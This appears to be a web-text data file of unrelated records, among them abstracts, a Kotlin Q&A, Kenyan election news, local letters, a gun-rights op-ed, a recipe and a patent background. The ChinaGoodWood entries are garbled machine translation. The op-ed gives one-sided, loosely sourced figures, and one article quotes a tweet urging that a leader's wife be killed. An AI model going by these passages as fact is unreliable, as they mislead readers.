Discussions of public trust and confidence in the police and the courts often assume that the key to public feelings is the public's evaluation of the outcomes that the public receives from these legal authorities. In the case of the courts, discontent is often assumed to be linked to issues of cost and delay-instrumental concerns about the outcomes delivered to the public by the courts. In the case of the police, the inability to effectively control crime is frequently seen as driving public evaluations. This article presents an alternative procedural justice based model that links public trust and confidence to views about the manner in which legal authorities treat the public. Drawing upon psychological research about public evaluations of institutions and authorities it is argued that the key issue that shapes public views is a process based evaluation of the fairness of the procedures that the police and courts use to exercise their authority. Analyses from several studies exploring the basis of public views support this procedural justice based model of public evaluation. In addition, the results provide suggestions about the elements of procedures that are central to public judgments about their fairness. | 2023-08-12T01:27:15.642919 | https://example.com/article/1948 |
$265 Million Margin Facility - Domestic and International Acquisition Funds
Represented an offshore financial institution in a $265 million margin facility to certain domestic and international acquisition funds to provide them with additional leverage to acquire the controlling share in a major domestic company.
Email Disclaimer
Sending an email will not establish an attorney-client relationship. You should not send us any information that you want treated confidentially. By clicking Accept you acknowledge that we may review and use any information you transmit to us. | 2024-02-07T01:27:15.642919 | https://example.com/article/4586 |
There's a legal battle brewing over the presence of a cross on a veterans memorial display. American Humanist Association (courtesy) | 2024-04-07T01:27:15.642919 | https://example.com/article/4832 |
Q:
KOTLIN -> InstantiationException: Unable to instantiate fragment make sure class name exists, is public, and has an empty constructor that is public
I am using kotlin in my android app and got this crash report:
android.support.v4.app.Fragment$InstantiationException: Unable to instantiate fragment DetailsFragment: make sure class name exists, is public, and has an empty constructor that is public.
Here is my DetailsFragment class.
class DetailsFragment() : Fragment() {
private var workflowId: String? = null
private var workflowData: WorkflowData? = null
private var releaseAtStr: String? = null
public fun init(workflowId: String,
workflowData: WorkflowData,
releaseAtStr: String? = null) {
this.workflowId = workflowId
this.workflowData = workflowData
this.releaseAtStr = releaseAtStr
}
private var context: BaseActivity? = null
override fun onAttach(context: Context?) {
super.onAttach(context)
if (context is BaseActivity?) {
this.context = context
}
}
override fun onCreateView(inflater: LayoutInflater, container: ViewGroup?, savedInstanceState: Bundle?) =
inflater?.inflate(R.layout.fragment_approval_details, container, false)
override fun onActivityCreated(savedInstanceState: Bundle?) {
super.onActivityCreated(savedInstanceState)
loadingOverlay?.show()
populateWorkflowHistory()
}
}
Any idea how to fix it or at least reproduce?
Thanks.
A:
Try not to call constructor in your fragment:
class DetailsFragment : Fragment() {
private var workflowId: String? = null
private var workflowData: WorkflowData? = null
private var releaseAtStr: String? = null
public fun init(workflowId: String,
workflowData: WorkflowData,
releaseAtStr: String? = null) {
this.workflowId = workflowId
this.workflowData = workflowData
this.releaseAtStr = releaseAtStr
}
| 2023-08-25T01:27:15.642919 | https://example.com/article/7893 |
Successful use of plasmapheresis for granulomatosis with polyangiitis presenting as diffuse alveolar hemorrhage.
Diffuse alveolar hemorrhage (DAH) is uncommon in pediatric patients and is a rare presenting sign of granulomatosis with polyangiitis (GPA). We present the case a 14-year-old girl who presented with respiratory failure secondary to DAH as the initial presenting sign of GPA. Her clinical course improved after initiation of plasmapheresis therapy and she is now in clinical remission. | 2024-02-15T01:27:15.642919 | https://example.com/article/9066 |
During an interview with Breitbart, President Donald Trump revealed his administration is considering designating Mexican drug cartels as Foreign Terrorist Organizations (FTOs).
“We’re thinking about doing it very seriously. In fact, we’ve been thinking about it for a long time,” Trump said. “It’s psychological, but it’s also economic. As terrorists — as terrorist organizations, the answer is yes. They are.”
“Mexico, unfortunately, has lost control of the cartels,” he continued. “They’ve totally lost control of the cartels. Mexico last year had 42,000 deaths — murders — 42,000. It’s considered one of the most unsafe countries in the world.”
I'm not sure I agree with them being labeled terrorist organization, though they still need singled out and and put under harsh legal consequences.
When they lined up a bunch of heads not so very long ago to send a 'message', I think that qualifies them. As terrorists they can suffer harsh legal consequences, too, but other options are open as well.
How God must weep at humans' folly! Stand fast! God knows what he is doing!Seventeen Techniques for Truth SuppressionAnd I looked, and rose up, and said unto the nobles, and to the rulers, and to the rest of the people, Be not ye afraid of them: remember the Lord, which is great and terrible, and fight for your brethren, your sons, and your daughters, your wives, and your houses. Nehemiah 4:14 (KJV) | 2023-09-10T01:27:15.642919 | https://example.com/article/3341 |
1. Technical Field of the Invention
The invention relates generally to communication systems; and, more particularly, it relates to session recovery after a restart of at least one communication device within single user, multiple user, multiple access, and/or MIMO wireless communications.
2. Description of Related Art
Communication systems are known to support wireless and wire lined communications between wireless and/or wire lined communication devices. Such communication systems range from national and/or international cellular telephone systems to the Internet to point-to-point in-home wireless networks. Each type of communication system is constructed, and hence operates, in accordance with one or more communication standards. For instance, wireless communication systems may operate in accordance with one or more standards including, but not limited to, IEEE 802.11x, Bluetooth, advanced mobile phone services (AMPS), digital AMPS, global system for mobile communications (GSM), code division multiple access (CDMA), local multi-point distribution systems (LMDS), multi-channel-multi-point distribution systems (MMDS), and/or variations thereof.
With various types of wireless communications (e.g., single-output-single-input (SISO), multiple-input-single-output (MISO), single-input-multiple-output (SIMO), and multiple-input-multiple-output (MIMO)), it would be desirable to use one or more types of wireless communications to enhance data throughput within a WLAN. For example, high data rates can be achieved with MIMO communications in comparison to SISO communications. However, most WLAN include legacy wireless communication devices (i.e., devices that are compliant with an older version of a wireless communication standard). As such, a transmitter capable of MIMO wireless communications should also be backward compatible with legacy devices to function in a majority of existing WLANs. Therefore, a need exists for a WLAN device that is capable of high data throughput and is backward compatible with legacy devices. | 2023-08-24T01:27:15.642919 | https://example.com/article/8397 |
NAIROBI (Reuters) - Kenya’s Supreme Court on Friday nullified President Uhuru Kenyatta’s election win, citing irregularities, and ordered a new poll within 60 days, an unprecedented move in Africa where governments often hold sway over judges.
The ruling, broadcast to a stunned nation on television, sets up a new race between Kenyatta, 55, and veteran opponent Raila Odinga, 72.
Kenyatta called for calm and respect for the ruling and said he would run again in a televised speech. But he later struck a more combative note, criticizing the court for ignoring the will of the people and dismissing the chief justice’s colleagues as “wakora” (crooks).
In Odinga’s western heartland, cheering supporters paraded through the streets chanting and waving tree branches.
Kenya, a U.S. ally in the fight against Islamists and a trade gateway to East Africa, has a history of disputed votes.
A row over a 2007 poll, which Odinga challenged after being declared loser, was followed by weeks of ethnic bloodshed that killed more than 1,200 people. Kenya’s economy, the biggest in the region, slid into recession and neighboring economies wobbled.
Chief Justice David Maraga announced the Supreme Court’s verdict that was backed by four of the six judges, saying the declaration of Kenyatta’s victory was “invalid, null and void”. Details of the ruling will be released within 21 days.
In the court room, a grinning Odinga pumped his fist in the air. Outside, shares plummeted on the Nairobi bourse amid the uncertainty, while Kenyatta’s supporters grumbled. But the mood on the streets of the capital was jubilant rather than angry.
Judges said they found no misconduct by Kenyatta but said the election board “failed, neglected or refused to conduct the presidential election in a manner consistent with the dictates of the constitution.”
THE POWER OF JUDGES
Kenya’s judiciary went through sweeping changes after the 2007 election violence in a bid to restore confidence the legal system. Friday’s ruling is likely to galvanize pro-democracy campaigners across Africa, where many complain their judiciaries simply rubber stamp presidential rule.
“This is a monumental and unprecedented decision, very remarkable and courageous that will be watched carefully with keen interest across the continent,” said Comfort Ero, the head of the Africa program for the Crisis Group think-tank.
Kenyatta struck a conciliatory note in his televised address.
“The court has made its decision. We respect it. We don’t agree with it. And again, I say peace ... peace, peace, peace,” he told the nation. “That is the nature of democracy.”
But later he criticized the court, telling a rally at a Nairobi market: “Earlier, I was the president-elect. (Chief Justice) Maraga and his people those wakora (crooks) have said ‘let that election get lost’ ... Let Maraga know he is dealing with the incumbent president.” He spoke in kiswahili.
Official results had given Kenyatta 54.3 percent of the vote, compared to Odinga’s 44.7 percent, a lead of 1.4 million votes. Kenyatta’s ruling party also swept the legislature. Those results triggered angry protests and at least 28 people died in the police clamp-down that followed.
“For the first time in history of African democratization a ruling has been made by a court nullifying irregular elections for the president,” Odinga said outside the court.
Slideshow ( 22 images )
Later, he called for the commission to resign and face criminal prosecution.
International observers, including former U.S. Secretary of State John Kerry, had said they saw no manipulation of voting and tallying at polling stations. But the election board was slow posting forms showing polling station results online.
Thousands were missing when official results were declared, so opponents could not check totals. Court experts said some documents lacked official stamps or had figures that did not match official tallies.
The chairman of the election board said there would be personnel changes, but it was not clear if that would be enough for the opposition. Sweeping out the whole board would complicate efforts to hold a new poll within two months.
Slideshow ( 22 images )
DEMOCRATIC CREDENTIALS
In a nation of more than 40 ethnic groups, tribal loyalties often trump policy at election time. Kenyatta’s Kikuyu is the biggest of Kenya’s tribes but still a minority. Odinga is a Luo.
Odinga’s strongholds include his ethnic heartland in the west; the coast, where many of the nation’s Muslims live; and the urban slums. Residents of all three areas feel neglected by central government.
Kenyatta, whose Kikuyu tribe has produced three out of Kenya’s four presidents, has his main support base in the central region.
Kenyatta and Odinga are both scions of political families. Kenyatta’s father, Jomo Kenyatta, was the nation’s founding president and had a long-running rivalry with Odinga’s father. Oginga Odinga was originally Kenyatta’s deputy but eventually left the government to unsuccessfully contest the presidency.
Raila Odinga has contested the last three elections and lost each time. After each one, he claimed the votes were marred by rigging. In 2013, the Supreme Court dismissed his petition.
This time, his team focused on proving the process for tallying and transmitting results was flawed, rather than proving how much of the vote was rigged.
Residents in the western city of Kisumu, where Odinga has strong backing, cheered and motorcycle drivers hooted their horns. “Today is a special today and I will celebrate until I am worn out,” said 32-year-old Kevin Ouma.
In the eastern Rift Valley town of Kinangop, a stronghold for the ruling party, small groups gathered and complained.
“Over 8 million people supported the election of Uhuru Kenyatta but the Supreme Court has ignored this in the ruling which is very shameful,” said Matheri Wa Hungu.
Kenyan shares, which rallied after Kenyatta was declared winner, tumbled by 3.5 percent on Friday and prompted the authorities to suspend trading for half an hour. The shilling KES= fell by 0.4 percent and Kenya's dollar bonds fell.
But although analysts said there was likely to be short-term volatility, the ruling could be a long-term win for Kenya.
“The population’s lack of faith in the system is one of the reasons why politics often descends into violence,” said Emma Gordon, a senior analyst at risk analysis firm Verisk Maplecroft .
“While this decision cements the view that the (election board) was biased, it demonstrates that independent checks and balances do exist.”
For a graphic on Kenya's presidential election, click: here | 2024-03-27T01:27:15.642919 | https://example.com/article/8509 |
LETTERS TO THE EDITOR
This November, we in Jackson County have a decision to make for county commissioner. Let me just highlight why I enthusiastically support Doug Breidenthal for the position.
Comment
MailTribune.com
Writer
Posted Oct. 5, 2012 at 2:00 AM
Posted Oct. 5, 2012 at 2:00 AM
» Social News
This November, we in Jackson County have a decision to make for county commissioner. Let me just highlight why I enthusiastically support Doug Breidenthal for the position.
First and foremost, Doug has lived in our community for 22 years, has worked in the public and the private sector, knows the land-use issues we face and has great ideas on how we can determine what we all want Jackson County's future development to look like. He has common sense, he has created jobs, balanced budgets and has the skills we deserve in a commissioner.
In my never humble opinion, Doug clearly is the best choice for this important position. Please join me in voting for Doug Breidenthal for county commissioner. — Rosemary Harrington, Medford
I served as a juror on the trial for the murder of Kaelin Glazier. The presiding judge, Judge Ben Bloom, defined the solemn and professional atmosphere of the courtroom. Judge Bloom's knowledge of legal processes and procedures held all in the courtroom, whether media, visitors, jurors or attorneys, to a higher standard that would have been absent without his vigilant guidance from the bench.
Judge Bloom's exemplary performance and demeanor, (even in the Ruch field where Kaelin's remains were discovered), communicated to us that despite the emotionally charged impact of evidence, testimony and vivid descriptions of the brutally murdered girl who had been unceremoniously dumped in the desolate rural field, that justice and truth, for the sake of our community, the family and especially the victim, would be faithfully served.
A vote for Judge Ben Bloom is a vote for that justice. — Joel Axelrod, Ashland
There is an intelligent, energetic young man in this county who is running for a seat on the Jackson County Board of Commissioners. The man is Jeff Scroggin, and if you want balanced representation, you need to vote for him on Nov. 6.
It is impressive to witness the hard work Jeff has done to research, understand, and envision solutions to the problems of Jackson County. The experience he gained as a noncommissioned officer in the U.S. Army is clearly apparent in the focus he brings to every project before him and in the versatility with which he handles multiple projects that come across his desk.
Jeff Scroggin is a natural-born leader who understands the give-and-take of public office, and who can work across party lines to represent the public he serves. — Gail Beason, Talent
Thank you for the well-written, timely article and supportive editorial regarding our successful foster-care reduction efforts. Although it may seem that this sea change in approach to serving children and their families involved in the child welfare system was smooth and easy, it was really due to lengthy and dedicated work behind the scenes.
All of our local legislators were involved, but it happened because Sen. Alan Bates, who himself was a foster parent, dedicated months to championing this cause. This work culminated in the introduction of SB 964, which enabled our collaboration to continue our work and required that similar efforts be developed by all counties across the state.
Even in this extremely difficult economic climate, the bill passed unanimously in the Senate and 58-2 in the House. Sen. Bates built this support on data demonstrating the fiscal and human benefits realized though our collaboration, all this, while at the same time leading sweeping changes in health care, managing the usual heavy load of a legislator and caring for his medical patients.
With Sen. Bates' continual monitoring of these innovative changes, our partnership efforts will prove that systemic changes can work and will be successful statewide. — Rita Sullivan, executive director, OnTrack, Medford
For the voters of Phoenix: I am writing to introduce you to my choice for the next mayor of Phoenix, my husband of 33 years, Jeff Bellah.
Jeff has been a resident of Phoenix for 22 years and has raised two daughters in the Phoenix schools. He has almost 37 years experience working with the Department of Veterans Affairs, the U.S. Postal Service and the U.S. Army. He retired from federal service last year and is currently on the Phoenix City Council.
Jeff enjoys our city and is committed to a positive future for Phoenix. We hope to meet many of you as you consider your choice for the next mayor of Phoenix. — Laura Bellah, Phoenix
Some forms of abuse are hard to identify; physical abuse, however, is not. Last week more than 200 sick and injured living beings were seized by Josephine County Animal Control. Not surprisingly, the owner, Kandi Crow, has denied the charges.
If she is the owner of the Magical Miniature Horses / Crows Nest Miniatures breeding farm, then she should — and would — know what healthy and sick animals look like. How can anyone deny abuse? Surely the injuries such as broken legs and broken jaws didn't happen overnight; even signs of starvation take a painfully long time to become evident.
In the past, when Crow was convicted of animal abuse and neglect, she was sentenced to 10 days behind bars and had to pay more than 700 whole dollars in fines. However many injustices these helpless living beings have already endured, to allow Crow to get away with these atrocities again would be the greatest injustice of all.
When justice fails to protect those who need it the most, then it is justice itself that should be on trial. — Louise Garner, White City
I was rather intrigued with (Phoenix mayoral candidate) Steven Schulman's letter to the editor on Sept. 16, "The study won't cut it."
It brought back memories of a letter I penned, and you so kindly published on Nov. 30, 2010.
In the upcoming election we are given two rather distinct choices. The Democratic Party will provide a fairly stable economy with a modest rate of growth. They will also provide reasonable protection for the environment and attention to human needs.
The Republican Party, on the other hand, will provide an economy that may grow faster, but with fewer safeguards. It may collapse as it did a few years ago. It will scrap many programs that help disadvantaged people, and it will likely roll back environmental, consumer and worker protection plans. Neither party is likely to balance the budget.
If we do choose a lightly regulated, free-market economy, we must provide for the honest needs of the people who will inevitably fall through the cracks, if we are to retain the right to call ourselves civilized. — Bill McWhorter, Medford
I very much appreciated the articles regarding the candidates' positions on Medicare by Ricardo Alonso-Zaldivar.
Lucid, unbiased and informative. During this election period this is the kind of reporting I wish to see more of. In the midst of so much divisive polemics, the voters wanting to be well-informed need all the help we can get. Thank you. — Susanne Powell, Ashland
A few months ago I began the unfortunate process of going through a divorce. In due course I had to appear before Judge Bloom in family court. Because a good portion of the rest of my life would be decided by the judge,
I actually stayed after my initial hearing concluded so that I could get a feel for how Judge Bloom ran his courtroom, interacted with the attorneys, and most of all, how he treated the citizens.
I was impressed with his thoughtfulness, patience and respect.
I felt that he treated each case with fairness and, most importantly, he was not distracted by the "$200 arguments" that the attorneys concocted. I would encourage anyone who is concerned with families and justice to support Judge Bloom. — Kendrick Scott, Talent | 2024-06-24T01:27:15.642919 | https://example.com/article/2609 |
The social justice attack on the Linux kernel is too dangerous for all of us - adsfqwop
https://www.youtube.com/watch?v=TQs2JlP8tcg
======
crooked-v
A code of conduct that can be summarized as "don't be a jerk" isn't "social
justice", it's just basic professionalism.
The actual CoC, for context:
[https://www.kernel.org/doc/html/latest/process/code-of-
condu...](https://www.kernel.org/doc/html/latest/process/code-of-
conduct.html#)
------
macros
This guy's argument is basically good coders should be allowed to be garbage
people and require others to put up with them because they open source the
code he relies on.
To be fair, I mostly tuned out the moment he mentioned Jordan Peterson.
~~~
Aqua
Forcing somebody out of their jobs/hobbies because you disagree with their
political views is absurd.
As long as the person who is an amazing coder contributes great code I
honestly couldn't care less if they eat meat, support Trump or do sports in
their own _private_ lives and I advise you and the rest of the community who
want to force their own views upon others do the same.
| 2023-10-01T01:27:15.642919 | https://example.com/article/6402 |
Directions
Preheat oven to 350 degrees.
In a large, shallow bowl, create the spice rub by mixing well the paprika, chili powder, black pepper, dried minced onion, garlic powder, and salt. Set aside. Cut the limes in half, and in a large mixing bowl, drizzle lime juice over the tilapia.
Dredge each piece of lime-flavored tilapia in the spice rub (the lime juice should help the spices stick to the fish), shaking off any excess. Discard any unused seasoning. Place the fish in a single layer in a large baking dish. Drizzle with ½ tablespoon olive oil. Bake for about 20-25 minutes, or until fish is done.
Reader Interactions
Primary Sidebar
About Alison J. Bermack
It all began when I was a child cooking with my dad, the kitchen a magnet for cooking and camaraderie, a refuge from adolescence. I spent countless hours chopping, sautéing and simmering my way through childhood. And now, with three kids of my own, I’m still chopping, but this time through their childhood and often with friends. | 2024-04-20T01:27:15.642919 | https://example.com/article/9190 |
【ChinaGoodWood.com】 the wooden door product on the market has “real wood door”, “real wood compound door” and “lacquer door” wait for all sorts of concepts, wooden door price also lets a person unidentified. Because wooden door can see a surface to be unable to judge immanent quality only, because this is in quality control, consumer […]
【ChinaGoodWood.com】 the wooden door industry develops very fast, many places all use the wooden door. But how should wooden door install again? What skill does wooden door installation have again? Below, small make up to tell you. A, how to install before wooden door installation: 1, before wooden door installation must first horizontal find a […]
【ChinaGoodWood.com】 many people think that the thicker the tempered glass the better, but this is not the case.So how should vitreous door choose and buy?What do glass doors do?Let’s learn more about it together.The action glass door with its concise and easy, daylighting is good, be able to bear or endure push-pull, adiabatic effect is […]
【ChinaGoodWood.com】 horizontal pull the sound insulation performance of the window depends on between two Windows and between the window and window frame of close close degree, and push the window is to depend on its close close degree of the window after closing and frame, window of model steel door USES adhesive strip to seal […]
【ChinaGoodWood.com】 in the process that we decorate a house, the work that installs wooden door is to have professional to decorate a master to finish.Although we do not need to move the water personally, but it is necessary to know some about the house decoration process in the wooden door installation of some relevant information, […]
【ChinaGoodWood.com】 the process of installing wooden doors is a very important and crucial step for young people who carry out house decoration.How to install the wooden door smoothly? There are many problems and details that need our attention.For a lot of young people who do not understand the installation of indoor wooden doors, when the […]
[ChinaGoodWood.com] in the space of the bedroom, the window curtain is good show amorous feelings of the beam with a belt, in other parts of the window can also show different visual enjoyment, bay window decorate a design more and more popular, the design of bay window also becomes a indispensable, so families choose window […]
[ChinaGoodWood.com] the Windows of residential buildings in the market are divided into flat Windows, French Windows, bay Windows, arc-shaped Windows and a small number of special-shaped Windows. According to the opening direction of the Windows, they are divided into: flat push-pull Windows, external Windows and internal Windows. According to the different types of Windows and […]
【ChinaGoodWood.com】 every winter, many people either close the doors and Windows, or occasionally open the window, afraid of the wind sneaks into the room, a winter you are too cold to open the window?Are you used to opening Windows first thing in the morning and then later?Do you only open the window once a day?These […]
【ChinaGoodWood.com】 hanging door is widely used in balcony, dining room, kitchen, bathroom partition and other areas.We all know that the main bearing force of the lift lift door is the upper rail of the lift lift door, and the quality of the lifting wheel also determines the service life of the lift lift door, so […] | 2023-08-13T01:27:15.642919 | https://example.com/article/3325 |
When Tahrir Square was not playing host to Egypt’s revolutionary sequels, it became one of the chief unofficial nerve centres of the Syrian Revolution. Thousands of fleeing Syrians quickly connected with Egyptian activism, coordinated with the Syrian National Council (SNC), raised awareness amongst Egyptians, set up tents, launched weekly protests, collected donations, hosted conferences, pressured the nearby Arab League, and disseminated information from inside Syria with international media outlets and journalists based in Cairo.
Syrian activities could be found in the shadow of the Arab League building and on the steps of the Alexandria library, the Bibliotheca Alexandrina. In various protest marches, Syrian flags compete with Egyptian flags and Syrian accents become increasingly audible.
Syrian activism in Cairo developed major advantages over other regional capitals. Amman was overrun by Syrian intelligence operatives, Beirut saw Hezbollah and pro-Assad allies hand over Syrian activists and defecting soldiers back to the Syrian regime, and despite Turkey’s state-sanctioned benevolence towards the Syrian uprising (and Turkey has done much for the opposition), it is suspected by key Syrian opposition figures of harbouring Turkish, some would say neo-Ottoman, designs on Syria’s future. The minority Kurds who feature prominently in the SNC are at the forefront of such suspicions.
Cairo was a different story. The Syrian revolution came to the streets of Egypt with a Supreme Council of the Armed Forces (SCAF) busy with its own internal issues, and a public space that had become synonymous with civil disobedience and witnessed its own revolution. Three primary Syrian revolutionary movements set up shop: the Muslim Brotherhood induced Syrian Revolution Association in Egypt (SRAE), the moderate Dignity movement, and the non-political Syrian Freedom Youth. Syrian activism was facilitated by a favourable environment.
Egyptian society has arguably declared ‘total war’ against the Assad regime. Numerous segments of the Egyptian public have thrown their weight behind “their” Syrian revolution and cheered for their team. Egypt’s ageing Nasserist generation, young liberal activists, Anti-Alawite Islamists alike, all supported the narrative of their counterparts on the Syrian revolutionary front. Not to mention Egypt’s Muslim Brotherhood who wish to see their franchise in Syria prevail.
Often Egyptians cross societal lines in the interests of the Syrian revolution. In one case, an Egyptian friend of mine was requested by a Salafi group to feature in a pro-Syrian revolution awareness video. I asked him why he was chosen, given that he was neither a Salafi nor did he have a beard. He replied that was exactly why, as the more progressive elements of Egypt’s Salafi groups sought a consensus on the Syrian Revolution and having a “non-divisive” looking Egyptian would help push the Syrian revolution up the list of priorities for Egyptians.
High up it is. According to a December 2011 Gallup poll, 56 percent of Egyptians supported the Syrian uprising, 31 percent said they were unsure, and 12 percent said they were opposed to the Syrian protesters. Yet the 31 percent should not be interpreted as support for Assad, it is regional instability that inspires the public’s assessment, particularly in the Coptic Church where people fear for their counterparts at the hands of Islamists. Today, anecdotally, the support for the protests has considerably grown.
Egyptian activists have been moonlighting the Syrian revolution due, in part, to dissatisfaction regarding their own revolution. Twitter feed noise shows Egyptians tweeting advice to their counterparts in Syria such as “Do not take photographs with tanks (@MYousrySalama)” and “Don’t forget Bashar’s wife. She should be buried with him. Do not leave her free and do what some idiots I know have done (@esraamahfouz).”
Egypt’s high politics have also taken on the cause with earnest. Last February, members of the SNC entered Egypt’s parliament to a rapturous welcome and bearing the Syrian freedom flag, the first time in living memory that a non-Egyptian flag was brought into parliament.
Something about Assad’s Syria taps deep into the fears of the Egyptian psyche: the republican hereditary succession that started in Damascus when Bashar inherited power from his father in 2000 threatened to spill over into Egypt too. The Mubarak family at least saw a precedent, and what followed were years of policies and maneuvers designed to pave the way for Gamal Mubarak’s succession to the throne. Bashar’s ominous face always loomed in Egypt’s media and public discourse of what awaited Egypt’s future.
The subtext exhibits a powerful historical romanticism — past dynasties and dictatorships, from Saladin to Gamal Abdel-Nasser that united Syria and Egypt have fuelled a pan-Arabism from below that now challenges elite-driven pan-Arabism from above. This is underpinned by the unspoken ethos of the so-called ‘Arab Spring’, in which one Arab society needs to aid another Arab society against their respective dictatorships.
This is nurturing a symbiotic relationship between the post-revolutionary states of Egypt and soon to be Syria. Egypt perceives Syria as a partner (albeit a slightly junior one) that it needs if it is to fulfil regional ambitions that are yet to take shape. At first glance, this may seem unlikely, given SCAF’s lack of imagination and lacklustre policies. Yet Egypt’s military establishment is growing weary of a rising Turkey and Iran that marginalises Egypt’s regional role. This partially explains why Syrian activism in Egypt is tolerated by them.
Furthermore, there is a growing discourse in Egypt’s media, academia, and across the political spectrum on what Egypt’s role should be in the region and how to revive its soft power. Syria prides itself as the co-author of Arab ideas and cultural works, yet it requires heavyweight Egypt — its complex social structures and dynamic agencies — to disseminate such trends throughout the Arab world.
There is a long way to go though. Egypt’s economic dire straits need major fixing and Syria’s road to political stabilisation will be long. Yet the pages of the future look more blank than before with an emerging generation of Arabs in possession of ink-filled pens. Which Arabs hold onto those pens is the next question. | 2024-06-23T01:27:15.642919 | https://example.com/article/4320 |
Dear America, Taking Guns from the 99% Gives the 1% All of the Power 100% of the Time
As is the case after every single time a crazed maniac causes a tragedy using firearms, politicians and their supporters come out of the woodwork to demand Americans give up their guns. Sadly, as is the case every single time, the citizens who support giving up their right to self-defense miss the bigger picture. When law-abiding citizens turn in their guns, only the government — and criminals — have guns.
The irony here is so glaringly ridiculous that it almost hurts. With the exception of the neoconservative tyrant class, most of the people calling for Americans to be disarmed are not supportive of the current administration. Arguably, many of the people calling for Americans to be disarmed are also the ones taking a stand against racist police tactics and brutality.
The disconnect happens here. People who dislike Donald Trump and who, rightfully so, call out the problem of police brutality in America, want to give all the guns in the country to Donald Trump and the police.
The bottom line is that government, historically speaking, is the most violent entity in the world. In the 20th Century alone, governments were responsible for 260,000,000 deaths worldwide. That number is greater than all deaths from illicit drug use, STD’s, Homicides, and Traffic Accidents — combined. And this is who we want to have all the guns?
What happened in Las Vegas was tragic and, naturally, good people want to prevent it from happening in the future so they search for solutions. However, the reality is that disarming law-abiding decent citizens does nothing to stop the next crazed criminal from taking innocent lives.
But what about Australia? They gave up their guns and shooting fatalities declined. On the surface, this is technically correct.
Australia’s anti-gun campaign and propaganda launched after a mass shooter killed 35 people in one heinous act of murder. The tragedy took place in 1996, in the city of Port Arthur. Following the crime, and in the wake of national agony, then Prime Minister John Howard moved to take back all the gun rights Australians had since the country’s founding.
The Port Arthur shooting was a tragic time for the Aussies. But the reality is that Australia never really had a mass shooting problem and gun violence was on the declinebefore Port Arthur.
Prior to Port Arthur, the worst mass shooting in recent history for Australians was the Coniston massacre. At the Coniston massacre, the government sanctioned the wholesale slaughter Indigenous Australians. More than 170 men, women, and children were gunned down in a state-approved act of mass murder. This was all legal.
In 1996, the government took at least 650,000 guns, or about one-fifth of all guns in the country; higher estimates put the numbers at 1 million and one-third.
Even with possession shaming, and amid the fear and threat of prosecution, Australians have yet to give up all their guns. It is estimated nearly 300,000 guns are still on the streets in the land down under. These guns don’t belong to the law-abiding citizens either.
In the United States, there are over 300,000,000 firearms. An Aussie-style program would never work. Even if it was tried, it would lead to massive civil unrest, violence, arrests, and even civil war.
According to official FBI and U.S. Department of Justice reports, the rates of violent crime in the U.S. are now at their lowest level in 40 years. Violent crime rates of 2015 were 1/4 the rates of 1993? Other countries are experiencing a similar decline. And, with the exception of one or two years, deaths of law enforcement officers reached their lowest in 50 years as well.
In fact, right now, in our history as a human species, it is the safest time to be alive — not just in America either. All across the planet, despite your television saying otherwise, violence against other humans is declining.
In the days of mass communication and massive technological leaps, people are able to shed stereotypes and fears far faster than would otherwise lead them to ignorant violence. Governments and mainstream media now have to implement extensive propaganda campaigns to sell society wars because the old “they are bad” technique is simply losing its effect.
The warmongering powers that be have to resort to this propaganda because of those 300,000,000 guns in the homes of law-abiding citizens. Because we are a well-armed society, the state cannot simply demand we acquiesce to their every desire.
So, as you hear people call for gun control, or even if you feel the same urge, remember who benefits from it — the 1 percent — who are the most violent humans left on the planet.
Matt Agorist is an honorably discharged veteran of the USMC and former intelligence operator directly tasked by the NSA. This prior experience gives him unique insight into the world of government corruption and the American police state. Agorist has been an independent journalist for over a decade and has been featured on mainstream networks around the world. Agorist is also the Editor at Large at the Free Thought Project. Follow @MattAgorist on Twitter, Steemit, and now on Facebook.
Don't forget to follow D.C. Clothesline on Facebook and Twitter. PLEASE help spread the word by sharing our articles on your favorite social networks. | 2023-11-14T01:27:15.642919 | https://example.com/article/3197 |
With less than one month left until national signing day, the time to close on your top targets has never been more important and the talented Tre'vell Dixon certainly fits that mold of being an influential difference maker for several programs.
The Louisiana native has already committed and de-committed once from Nebraska but the Cornhuskers have found themselves right in the thick of things along with Houston, Arizona St. and TCU as Dixon makes his final decision. | 2024-01-15T01:27:15.642919 | https://example.com/article/6074 |
There is a growing body of evidence that domesticated animals and in particular laboratory animals exhibit behaviors that in humans are associated with sensory deprivation and depression. These abnormal behaviors not only impact the well-being of an individual animal but also have implications in studies involving such an animal owing to the physiological effects of sensory deprivation and depression. In humans, sensory deprivation and depression have an effect on metabolism, cognitive function, immune response and other parameters relevant to clinical studies. The ability to provide a laboratory animal with a degree of mental stimulation is hampered by the requirements of study protocols that attempt to avoid introduction of new reaction variables, as well as the requirement in many instances that only sterilized materials be brought into contact with a laboratory animal. Captive animals deserve an environment which is rich in social opportunity, mental stimulation, and physical challenges. Sterility conditions are typically enforced in instances where an animal has been immunocompromised or otherwise carries a genetic defect rendering an animal vulnerable to disease or infection.
With laboratory study requirements, litter provided to absorb animal urine and desiccate fecal material is one of a limited number of opportunities to provide a source of stimulation to a confined laboratory animal. Prior art attempts have been made to include folded squares of paper with the intention that the animal would occupy time delaminating and chewing or unfolding the small chips of paper. Unfortunately, such attempts met with limited success owing to the disinterest of mice (especially male species) and rats confined within laboratory cages to actually play with the folded squares of paper. The 1985 amendments to the Animal Welfare Act included provisions for the promotion of the psychological well-being of nonhuman primates and for exercise for dogs. Today, many research, teaching and testing facilities have established environmental enrichment programs for all animal species. (awic.nal.usda.gov/nal_display/index) are representative of this effort.
Sheehan (U.S. Pat. No. 5,909,718) teaches a method of making particulate absorbent material from waste paper for the use of the material as a base for animal bedding. The waste paper is shredded, mixed with water and a binder, and dried to form solid paper particles having a diameter of from about 0.05 to about 2.0 centimeters. These have met with limited acceptance owing to exposing laboratory animals to unknown substances associated with the waste nature of the paper, as well as the lack of play value afforded to animals.
Tucci (U.S. Pat. No. 4,038,944) provides a synthetic animal bedding in recognition of the fact that natural bedding material must be replaced periodically and is not reusable. Although having tried to solve prior problems associated with the reusability of natural straw bedding, Tucci disfavors straws and further requires that the synthetic plastic pieces be arranged relatively parallel to the ground or bottom surface.
Similarly, Mochizuki (U.S. Pat. No. 6,405,676) teaches a twisted paper cylindrical material as a urine-absorbing litter. However, this material has met with limited acceptance owing to a low density and asymmetric shape that makes scooping and handling difficult. Also, presumably owing to the uniformity of the material as being exclusively twisted paper cylinders, sensory deprived animals are observed to be indifferent to playing with the paper cylinders.
Thus, there exists a need for an animal litter product that engages the attention of a laboratory animal to occupy time and alleviate some of the symptoms associated with sensory deprivation and depression. There further exists a need for such a litter capable of being sterilized and still functioning as an effective animal litter product. | 2024-05-27T01:27:15.642919 | https://example.com/article/9693 |
